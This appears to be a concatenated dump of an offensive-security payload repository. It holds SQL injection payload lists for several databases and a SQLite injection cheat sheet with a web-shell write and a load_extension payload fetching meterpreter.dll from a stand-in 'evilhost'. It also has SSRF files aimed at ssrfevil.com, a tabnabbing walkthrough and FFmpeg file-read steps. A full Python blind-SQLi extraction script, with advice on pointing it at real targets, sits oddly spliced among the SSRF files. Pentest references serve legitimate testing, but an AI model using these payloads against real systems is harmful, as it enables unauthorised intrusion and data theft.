Injection/Intruder/Generic_TimeBased.txt: -------------------------------------------------------------------------------- 1 | # from wapiti 2 | sleep(5)# 3 | 1 or sleep(5)# 4 | " or sleep(5)# 5 | ' or sleep(5)# 6 | " or sleep(5)=" 7 | ' or sleep(5)=' 8 | 1) or sleep(5)# 9 | ") or sleep(5)=" 10 | ') or sleep(5)=' 11 | 1)) or sleep(5)# 12 | ")) or sleep(5)=" 13 | ')) or sleep(5)=' 14 | ;waitfor delay '0:0:5'-- 15 | );waitfor delay '0:0:5'-- 16 | ';waitfor delay '0:0:5'-- 17 | ";waitfor delay '0:0:5'-- 18 | ');waitfor delay '0:0:5'-- 19 | ");waitfor delay '0:0:5'-- 20 | ));waitfor delay '0:0:5'-- 21 | '));waitfor delay '0:0:5'-- 22 | "));waitfor delay '0:0:5'-- 23 | benchmark(10000000,MD5(1))# 24 | 1 or benchmark(10000000,MD5(1))# 25 | " or benchmark(10000000,MD5(1))# 26 | ' or benchmark(10000000,MD5(1))# 27 | 1) or benchmark(10000000,MD5(1))# 28 | ") or benchmark(10000000,MD5(1))# 29 | ') or benchmark(10000000,MD5(1))# 30 | 1)) or benchmark(10000000,MD5(1))# 31 | ")) or benchmark(10000000,MD5(1))# 32 | ')) or benchmark(10000000,MD5(1))# 33 | pg_sleep(5)-- 34 | 1 or pg_sleep(5)-- 35 | " or pg_sleep(5)-- 36 | ' or pg_sleep(5)-- 37 | 1) or pg_sleep(5)-- 38 | ") or pg_sleep(5)-- 39 | ') or pg_sleep(5)-- 40 | 1)) or pg_sleep(5)-- 41 | ")) or pg_sleep(5)-- 42 | ')) or pg_sleep(5)-- 43 | AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe 44 | AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' 45 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP) 46 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- 47 | AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)# 48 | SLEEP(5)# 49 | SLEEP(5)-- 50 | SLEEP(5)=" 51 | SLEEP(5)=' 52 | or SLEEP(5) 53 | or SLEEP(5)# 54 | or SLEEP(5)-- 55 | or SLEEP(5)=" 56 | or SLEEP(5)=' 57 | waitfor delay '00:00:05' 58 | waitfor delay '00:00:05'-- 59 | waitfor delay '00:00:05'# 60 | benchmark(50000000,MD5(1)) 61 | benchmark(50000000,MD5(1))-- 62 | benchmark(50000000,MD5(1))# 63 | or benchmark(50000000,MD5(1)) 64 | or benchmark(50000000,MD5(1))-- 65 | or 
benchmark(50000000,MD5(1))# 66 | pg_SLEEP(5) 67 | pg_SLEEP(5)-- 68 | pg_SLEEP(5)# 69 | or pg_SLEEP(5) 70 | or pg_SLEEP(5)-- 71 | or pg_SLEEP(5)# 72 | '\" 73 | AnD SLEEP(5) 74 | AnD SLEEP(5)-- 75 | AnD SLEEP(5)# 76 | &&SLEEP(5) 77 | &&SLEEP(5)-- 78 | &&SLEEP(5)# 79 | ' AnD SLEEP(5) ANd '1 80 | '&&SLEEP(5)&&'1 81 | ORDER BY SLEEP(5) 82 | ORDER BY SLEEP(5)-- 83 | ORDER BY SLEEP(5)# 84 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj) 85 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)# 86 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)-- 87 | +benchmark(3200,SHA1(1))+' 88 | + SLEEP(10) + ' 89 | RANDOMBLOB(500000000/2) 90 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) 91 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) 92 | RANDOMBLOB(1000000000/2) 93 | AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) 94 | OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) 95 | SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/ 96 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/SQL-Injection: -------------------------------------------------------------------------------- 1 | ' 2 | '' 3 | ` 4 | `` 5 | , 6 | " 7 | "" 8 | / 9 | // 10 | \ 11 | \\ 12 | ; 13 | ' or " 14 | -- or # 15 | ' OR '1 16 | ' OR 1 -- - 17 | " OR "" = " 18 | " OR 1 = 1 -- - 19 | ' OR '' = ' 20 | '=' 21 | 'LIKE' 22 | '=0--+ 23 | OR 1=1 24 | ' OR 'x'='x 25 | ' AND id IS NULL; -- 26 | '''''''''''''UNION SELECT '2 27 | %00 28 | /*…*/ 29 | + addition, concatenate (or space in url) 30 | || (double pipe) concatenate 31 | % wildcard attribute indicator 32 | @variable local variable 33 | @@variable global variable 34 | # Numeric 35 | AND 1 36 | AND 0 37 | AND true 38 | AND false 39 | 1-false 40 | 1-true 41 | 1*56 42 | -2 43 | 1' ORDER BY 1--+ 44 | 1' ORDER BY 2--+ 45 | 1' ORDER BY 3--+ 46 | 1' ORDER BY 1,2--+ 47 | 1' ORDER BY 1,2,3--+ 48 | 1' GROUP BY 1,2,--+ 49 | 1' GROUP BY 1,2,3--+ 50 | ' GROUP BY columnnames having 1=1 -- 51 | -1' UNION 
SELECT 1,2,3--+ 52 | ' UNION SELECT sum(columnname ) from tablename -- 53 | -1 UNION SELECT 1 INTO @,@ 54 | -1 UNION SELECT 1 INTO @,@,@ 55 | 1 AND (SELECT * FROM Users) = 1 56 | ' AND MID(VERSION(),1,1) = '5'; 57 | ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- 58 | Finding the table name 59 | Time-Based: 60 | ,(select * from (select(sleep(10)))a) 61 | %2c(select%20*%20from%20(select(sleep(10)))a) 62 | ';WAITFOR DELAY '0:0:30'-- 63 | Comments: 64 | # Hash comment 65 | /* C-style comment 66 | -- - SQL comment 67 | ;%00 Nullbyte 68 | ` Backtick 69 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/SQLi_Polyglots.txt: -------------------------------------------------------------------------------- 1 | SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ 2 | SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample 3 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/payloads-sql-blind-MSSQL-WHERE: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ) waitfor delay '0:0:20' /* 8 | ) waitfor delay '0:0:20' -- 9 | )) waitfor delay '0:0:20' /* 10 | )) waitfor delay '0:0:20' -- 11 | ))) waitfor delay '0:0:20' /* 12 | ))) waitfor delay '0:0:20' -- 13 | )))) waitfor delay '0:0:20' /* 14 | )))) waitfor delay '0:0:20' -- 15 | ))))) waitfor delay '0:0:20' -- 16 | )))))) waitfor delay '0:0:20' -- 17 | ') waitfor delay '0:0:20' /* 18 | ') waitfor delay '0:0:20' -- 19 | ") waitfor delay '0:0:20' 
/* 20 | ") waitfor delay '0:0:20' -- 21 | ')) waitfor delay '0:0:20' /* 22 | ')) waitfor delay '0:0:20' -- 23 | ")) waitfor delay '0:0:20' /* 24 | ")) waitfor delay '0:0:20' -- 25 | '))) waitfor delay '0:0:20' /* 26 | '))) waitfor delay '0:0:20' -- 27 | "))) waitfor delay '0:0:20' /* 28 | "))) waitfor delay '0:0:20' -- 29 | ')))) waitfor delay '0:0:20' /* 30 | ')))) waitfor delay '0:0:20' -- 31 | ")))) waitfor delay '0:0:20' /* 32 | ")))) waitfor delay '0:0:20' -- 33 | '))))) waitfor delay '0:0:20' /* 34 | '))))) waitfor delay '0:0:20' -- 35 | "))))) waitfor delay '0:0:20' /* 36 | "))))) waitfor delay '0:0:20' -- 37 | ')))))) waitfor delay '0:0:20' /* 38 | ')))))) waitfor delay '0:0:20' -- 39 | ")))))) waitfor delay '0:0:20' /* 40 | ")))))) waitfor delay '0:0:20' -- 41 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY: -------------------------------------------------------------------------------- 1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 2 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 10 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 12 | 
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 17 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 18 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 19 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/payloads-sql-blind-MySQL-WHERE: -------------------------------------------------------------------------------- 1 | and 0=benchmark(3000000,MD5(1))%20/* 2 | and 0=benchmark(3000000,MD5(1))%20-- 3 | and 0=benchmark(3000000,MD5(1))%20%23 4 | ' and 0=benchmark(3000000,MD5(1))%20/* 5 | ' and 0=benchmark(3000000,MD5(1))%20-- 6 | ' and 0=benchmark(3000000,MD5(1))%20%23 7 | " and 0=benchmark(3000000,MD5(1))%20/* 8 | " and 0=benchmark(3000000,MD5(1))%20-- 9 | " and 0=benchmark(3000000,MD5(1))%20%23 10 | ) and 0=benchmark(3000000,MD5(1))%20/* 11 | ) and 0=benchmark(3000000,MD5(1))%20-- 12 | ) and 0=benchmark(3000000,MD5(1))%20%23 13 | )) and 0=benchmark(3000000,MD5(1))%20/* 14 | )) and 0=benchmark(3000000,MD5(1))%20-- 15 | )) and 0=benchmark(3000000,MD5(1))%20%23 16 | ))) and 0=benchmark(3000000,MD5(1))%20/* 17 | ))) and 0=benchmark(3000000,MD5(1))%20-- 18 | ))) and 0=benchmark(3000000,MD5(1))%20%23 19 | )))) and 0=benchmark(3000000,MD5(1))%20/* 20 | )))) and 0=benchmark(3000000,MD5(1))%20-- 21 | )))) and 0=benchmark(3000000,MD5(1))%20%23 22 | ') and 0=benchmark(3000000,MD5(1))%20/* 23 | ') and 0=benchmark(3000000,MD5(1))%20-- 24 | ') and 0=benchmark(3000000,MD5(1))%20%23 25 | ") and 0=benchmark(3000000,MD5(1))%20/* 26 | ") and 
0=benchmark(3000000,MD5(1))%20-- 27 | ") and 0=benchmark(3000000,MD5(1))%20%23 28 | ')) and 0=benchmark(3000000,MD5(1))%20/* 29 | ')) and 0=benchmark(3000000,MD5(1))%20-- 30 | ')) and 0=benchmark(3000000,MD5(1))%20%23 31 | ")) and 0=benchmark(3000000,MD5(1))%20/* 32 | ")) and 0=benchmark(3000000,MD5(1))%20-- 33 | ")) and 0=benchmark(3000000,MD5(1))%20%23 34 | '))) and 0=benchmark(3000000,MD5(1))%20/* 35 | '))) and 0=benchmark(3000000,MD5(1))%20-- 36 | '))) and 0=benchmark(3000000,MD5(1))%20%23 37 | "))) and 0=benchmark(3000000,MD5(1))%20/* 38 | "))) and 0=benchmark(3000000,MD5(1))%20-- 39 | "))) and 0=benchmark(3000000,MD5(1))%20%23 40 | ')))) and 0=benchmark(3000000,MD5(1))%20/* 41 | ')))) and 0=benchmark(3000000,MD5(1))%20-- 42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23 43 | ")))) and 0=benchmark(3000000,MD5(1))%20/* 44 | ")))) and 0=benchmark(3000000,MD5(1))%20-- 45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23 46 | -------------------------------------------------------------------------------- /SQL Injection/SQLite Injection.md: -------------------------------------------------------------------------------- 1 | # SQLite Injection 2 | 3 | ## Summary 4 | 5 | * [SQLite comments](#sqlite-comments) 6 | * [SQLite version](#sqlite-version) 7 | * [Integer/String based - Extract table name](#integerstring-based---extract-table-name) 8 | * [Integer/String based - Extract column name](#integerstring-based---extract-column-name) 9 | * [Boolean - Count number of tables](#boolean---count-number-of-tables) 10 | * [Boolean - Enumerating table name](#boolean---enumerating-table-name) 11 | * [Boolean - Extract info](#boolean---extract-info) 12 | * [Time based](#time-based) 13 | * [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database) 14 | * [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension) 15 | * 
[References](#references) 16 | ## SQLite comments 17 | 18 | ```sql 19 | -- 20 | /**/ 21 | ``` 22 | 23 | ## SQLite version 24 | 25 | ```sql 26 | select sqlite_version(); 27 | ``` 28 | 29 | ## Integer/String based - Extract table name 30 | 31 | ```sql 32 | SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' 33 | ``` 34 | 35 | Iterate with `limit 1 offset X` (X = 0, 1, 2, ...) to extract the table names one at a time. 36 | 37 | ## Integer/String based - Extract column name 38 | 39 | ```sql 40 | SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name' 41 | ``` 42 | 43 | For cleaner output (strips the type keywords from the CREATE statement and separates the column names with `~~`): 44 | 45 | ```sql 46 | SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name' 47 | ``` 48 | 49 | ## Boolean - Count number of tables 50 | 51 | ```sql 52 | and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table 53 | ``` 54 | 55 | ## Boolean - Enumerating table name 56 | 57 | ```sql 58 | and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number 59 | ``` 60 | 61 | ## Boolean - Extract info 62 | 63 | ```sql 64 | and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char') 65 | ``` 66 | 67 | ## Time based 68 | 69 | ```sql 70 | AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) 71 | ``` 72 | 73 | ## Remote Command Execution using SQLite command - Attach Database 74 | 75 | ```sql 76 | ATTACH DATABASE '/var/www/lol.php' AS lol; 77 | CREATE TABLE lol.pwn (dataz 
text); 78 | INSERT INTO lol.pwn (dataz) VALUES ('');-- 79 | ``` 80 | 81 | ## Remote Command Execution using SQLite command - Load_extension 82 | 83 | ```sql 84 | UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- 85 | ``` 86 | 87 | Note: `load_extension()` is disabled by default; the application must have enabled it explicitly (via `sqlite3_enable_load_extension()`) for this payload to work. 88 | 89 | ## References 90 | 91 | [Injecting SQLite database based applications - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf) 92 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/SSRF_expect.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/SSRF_url.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_ffmpeg.avi: -------------------------------------------------------------------------------- 1 | #EXTM3U 2 | #EXT-X-MEDIA-SEQUENCE:0 3 | #EXTINF:1.0 4 | http://ssrfevil.com 5 | #EXT-X-ENDLIST -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_iframe.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_css_import.svg: -------------------------------------------------------------------------------- 1 | 2 | 5 | 7 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_css_link.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | 6 | 
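Returning to the three "Boolean" payloads of the SQLite Injection notes above: the following Python script is an added example, not code from the original page or from PayloadsAllTheThings. It builds a constructed in-memory SQLite database, wraps it in a hypothetical injectable lookup (`VulnerableApp.product_exists`, a stand-in for the target endpoint), and drives the page's `count(tbl_name)`, `length(tbl_name)` and `hex(substr(tbl_name,...))` payloads through that single true/false oracle to count the tables, measure each name and recover the names character by character. It goes one step beyond the page by binary-searching the `hex(substr(...))` comparison rather than testing one candidate character per request. Table names and data are made up for the example.

```python
import sqlite3

# Constructed stand-in for the target application's SQLite database
# (example data only, not from the original page).
def build_target_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO users VALUES (1, 'admin', 'hunter2');
        INSERT INTO products VALUES (1, 'widget', 9.99);
    """)
    return conn


class VulnerableApp:
    """Hypothetical endpoint: the id parameter is concatenated into the query,
    so whether a product row comes back is the attacker's boolean oracle."""

    def __init__(self, conn):
        self.conn = conn

    def product_exists(self, product_id: str) -> bool:
        query = "SELECT id FROM products WHERE id=" + product_id   # injectable
        return self.conn.execute(query).fetchone() is not None


# --- attacker side: only the True/False answer of product_exists() is observed ---
TABLES = "FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'"

def oracle(app: VulnerableApp, condition: str) -> bool:
    # Payload shape from the page: a valid id, then "and (<subquery comparison>)".
    return app.product_exists(f"1 and ({condition})")

def count_tables(app: VulnerableApp, max_tables: int = 64) -> int:
    # "Boolean - Count number of tables": binary search on count(tbl_name).
    lo, hi = 0, max_tables
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(app, f"(SELECT count(tbl_name) {TABLES}) <= {mid}"):
            hi = mid
        else:
            lo = mid + 1
    return lo

def table_name_length(app: VulnerableApp, offset: int, max_len: int = 64) -> int:
    # "Boolean - Enumerating table name": probe length(tbl_name) of one row.
    for n in range(1, max_len + 1):
        if oracle(app, f"(SELECT length(tbl_name) {TABLES} limit 1 offset {offset})={n}"):
            return n
    raise RuntimeError(f"table at offset {offset}: name longer than {max_len}")

def extract_char(app: VulnerableApp, offset: int, pos: int) -> str:
    # "Boolean - Extract info": compare hex(substr(...)) against hex(char(v)).
    # For a single printable byte the two-digit hex strings sort numerically,
    # so a binary search over 0x20..0x7e needs about 7 requests per character.
    lo, hi = 0x20, 0x7e
    while lo < hi:
        mid = (lo + hi + 1) // 2
        cond = (f"(SELECT hex(substr(tbl_name,{pos},1)) {TABLES} limit 1 offset {offset})"
                f" >= hex(char({mid}))")
        if oracle(app, cond):
            lo = mid          # the character is >= mid
        else:
            hi = mid - 1
    return chr(lo)

def extract_table_names(app: VulnerableApp) -> list:
    names = []
    for offset in range(count_tables(app)):
        length = table_name_length(app, offset)
        names.append("".join(extract_char(app, offset, p) for p in range(1, length + 1)))
    return names


if __name__ == "__main__":
    app = VulnerableApp(build_target_db())
    print(count_tables(app), extract_table_names(app))
```

Against a real target, `oracle()` is the only function that changes: replace the in-process call with an HTTP request and decide true/false from the response (status code, page length or a marker string), keeping the same payload strings. The `sqlite_%` filter in `TABLES` is the page's own; without an `ORDER BY`, the `limit 1 offset X` walk follows `sqlite_master` rowid order, which is creation order in practice.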
-------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_image.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_use.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/Parser & Curl < 7.54.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Server Side Request Forgery/Images/Parser & Curl < 7.54.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_PDF.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Server Side Request Forgery/Images/SSRF_PDF.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_Parser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Server Side Request Forgery/Images/SSRF_Parser.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_stream.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Server Side Request Forgery/Images/SSRF_stream.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/WeakParser.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Server Side Request Forgery/Images/WeakParser.jpg -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/aws-cli.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Server Side Request Forgery/Images/aws-cli.jpg -------------------------------------------------------------------------------- /Server Side Template Injection/Images/serverside.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Server Side Template Injection/Images/serverside.png -------------------------------------------------------------------------------- /TWITTER.md: -------------------------------------------------------------------------------- 1 | # Twitter 2 | 3 | Twitter is widely used in the InfoSec community. Much advice and many tips on bug hunting and CTF games are posted every day. It is worth following the feeds of some successful security researchers and hackers. 
4 | 5 | 6 | ### Accounts 7 | 8 | - [@Stök - Bug bounty hunter, cybersecurity educational content creator](https://twitter.com/stokfredrik) 9 | - [@NahamSec - Hacker & content creator & co-founder bugbountyforum and http://recon.dev](https://twitter.com/NahamSec) 10 | - [@dawgyg - Bug bounty hunter, reformed blackhat, Synack red team member](https://twitter.com/thedawgyg) 11 | - [@putsi - Bug bounty hunter and white hat hacker in Team ROT](https://twitter.com/putsi) 12 | - [@thecybermentor - Offers cybersecurity and hacking courses](https://twitter.com/thecybermentor) 13 | - [@InsiderPhD - PhD student, occasional bug bounty hunter & educational cyber security youtuber](https://twitter.com/InsiderPhD) 14 | - [@LiveOverflow - Content creator and hacker producing videos on various IT security topics and participating in hacking contests](https://twitter.com/LiveOverflow) 15 | - [@EdOverflow - Web developer, security researcher and triager for numerous vulnerability disclosure programs](https://twitter.com/edoverflow) 16 | - [@r0bre - Bug Hunter for web- and systemsecurity, iOS Security researcher](https://twitter.com/r0bre) 17 | - [@intigriti - European ethical hacking & bug bounty platform](https://twitter.com/intigriti) 18 | - [@Hacker0x01 - American bug bounty platform](https://twitter.com/Hacker0x01) 19 | - [@bugcrowd - Another american bug bounty platform](https://twitter.com/Bugcrowd) 20 | - [@hakluke - Bug bounty hunter, content creator, creator of some great pentesting tools like hakrawler](https://twitter.com/hakluke) 21 | - [@spaceraccoon - Security researcher and white hat hacker. 
Has worked on several bug bounty programs](https://twitter.com/spaceraccoonsec) 22 | - [@samwcyo - Full-time bug bounty hunter](https://twitter.com/samwcyo) 23 | - [@Th3G3nt3lman - Security researcher & bug bounty hunter](https://twitter.com/Th3G3nt3lman) 24 | - [@securinti - Dutch bug bounty hunter & head of hackers and board member @ intigriti](https://twitter.com/securinti) 25 | - [@jobertabma - Co-founder of HackerOne, security researcher](https://twitter.com/jobertabma) 26 | - [@codingo_ - Global Head of Security Ops and Researcher Enablement at Bugcrowd, maintainer of some great pentesting tools like NoSQLMap or VHostScan](https://twitter.com/codingo_) 27 | - [@TomNomNom - Security researcher, maintainer of many very useful pentesting tools](https://twitter.com/TomNomNom) 28 | - [@orange_8361 - Bug bounty hunter and security researcher, specialized in RCE bugs](https://twitter.com/orange_8361) 29 | - [@d0nutptr - Part-time bug hunter, Lead Security Engineer at graplsec](https://twitter.com/d0nutptr) 30 | - [@filedescriptor - Security researcher, bug hunter and content creator at 0xReconless](https://twitter.com/filedescriptor) 31 | - [@0xReconless - Security research, blogs, and videos by filedescriptor, ngalongc & EdOverflow](https://twitter.com/0xReconless) 32 | - [@pentest_swissky - Author of PayloadsAllTheThings & SSRFmap](https://twitter.com/pentest_swissky) 33 | -------------------------------------------------------------------------------- /Tabnabbing/README.md: -------------------------------------------------------------------------------- 1 | # Tabnabbing 2 | 3 | > Reverse tabnabbing is an attack where a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. As the user was originally on the correct page they are less likely to notice that it has been changed to a phishing site, especially if the site looks the same as the target. 
If the user authenticates to this new page then their credentials (or other sensitive data) are sent to the phishing site rather than the legitimate one. 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [More information about the vulnerability](#More-information-about-the-vulnerability) 9 | * [How to exploit](#How-to-exploit) 10 | * [How to hunt for it](#How-to-hunt-for-it) 11 | * [References](#references) 12 | 13 | ## Tools 14 | 15 | - [Discover Reverse Tabnabbing - Burp Extension](https://portswigger.net/bappstore/80eb8fd46bf847b4b17861482c2f2a30) 16 | 17 | ## More information about the vulnerability 18 | 19 | When hunting for tabnabbing, the attacker searches for links that are inserted into the website and are under his control, for example links contained in a forum post. Once he has found this kind of functionality, he checks that the link's `target` attribute contains the value `_blank` and that its `rel` attribute contains neither `noopener` nor `noreferrer` (`noreferrer` implies `noopener`). If this is the case, the website is vulnerable to tabnabbing. Note that current browsers (Chrome 88+, Firefox 79+, Safari 12.1+) treat `target="_blank"` as implying `noopener` by default, so the attack only works against older browsers or against pages that explicitly set `rel="opener"`. 20 | 21 | ## How to exploit 22 | ``` 23 | 1. The attacker posts a link to a website under his control that contains the following JS code: window.opener.location = "http://evil.com" 24 | 2. He tricks the victim into visiting the link, which is opened in the browser in a new tab. 25 | 3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website. 26 | 4. If the victim returns to the background tab without looking at the address bar, he may believe he has been logged out, because a login page appears, for example. 27 | 5. 
The victim tries to log on again and the attacker receives the credentials 28 | ``` 29 | 30 | ## How to hunt for it 31 | 32 | As already mentioned, you have to search for the following link formats: 33 | 34 | ```html 35 | 36 | or 37 | 38 | ``` 39 | 40 | ## References 41 | 42 | - [Reverse Tabnabbing - OWASP, 20.10.20](https://owasp.org/www-community/attacks/Reverse_Tabnabbing) 43 | - [Tabnabbing - Wikipedia, 20.10.20](https://en.wikipedia.org/wiki/Tabnabbing) 44 | -------------------------------------------------------------------------------- /Upload Insecure Files/CVE Ffmpeg HLS/README.md: -------------------------------------------------------------------------------- 1 | # FFmpeg HLS vulnerability 2 | FFmpeg is an open source software used for processing audio and video formats. You can use a malicious HLS playlist inside an AVI video to read arbitrary files. 3 | 4 | ## Exploits 5 | ``` 6 | 1. `./gen_xbin_avi.py file:// file_read.avi` 7 | 2. Upload `file_read.avi` to some website that processes videofiles 8 | 3. (on server side, done by the videoservice) `ffmpeg -i file_read.avi output.mp4` 9 | 4. Click "Play" in the videoservice. 10 | 5. If you are lucky, you'll the content of `` from the server. 11 | ``` 12 | 13 | ## How it works (Explanations from neex - Hackerone links) 14 | the script creates an AVI that contains an HLS playlist inside GAB2. The playlist generated by this script looks like this: 15 | ``` 16 | #EXTM3U 17 | #EXT-X-MEDIA-SEQUENCE:0 18 | 